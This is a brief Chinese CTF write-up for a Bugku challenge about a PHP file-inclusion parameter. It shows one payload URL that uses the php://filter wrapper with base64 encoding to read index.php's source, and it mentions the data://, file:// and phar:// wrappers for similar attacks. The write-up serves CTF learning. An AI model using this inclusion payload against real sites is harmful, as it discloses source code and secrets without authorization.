Bugku——Flag在index里(http://120.24.86.145:8005/post/)
进入题目发现有一个file参数,查看源码,发现该参数能够包含php文件,而且题目提示,flag在index.php里,因此想到能够用php协议来获取index.php的源码。
构造payload:
http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
得到通过base64编码后的源码,放到hackbar里解码一下得:
Getflag~
这道题须要注意两点,第一就是php协议,在这个文件包含的点使用php协议就能够读取任何文件源码,相似地还有data协议,file协议。web协议的种类多,利用方法也多,可谓是实战中的一大利器。在CTF线上赛中也常常用到,好比上次CUIT校赛以及西安的那个XCTF比赛中就用到了phar://协议。
想要仔细了解的伙伴可看一下: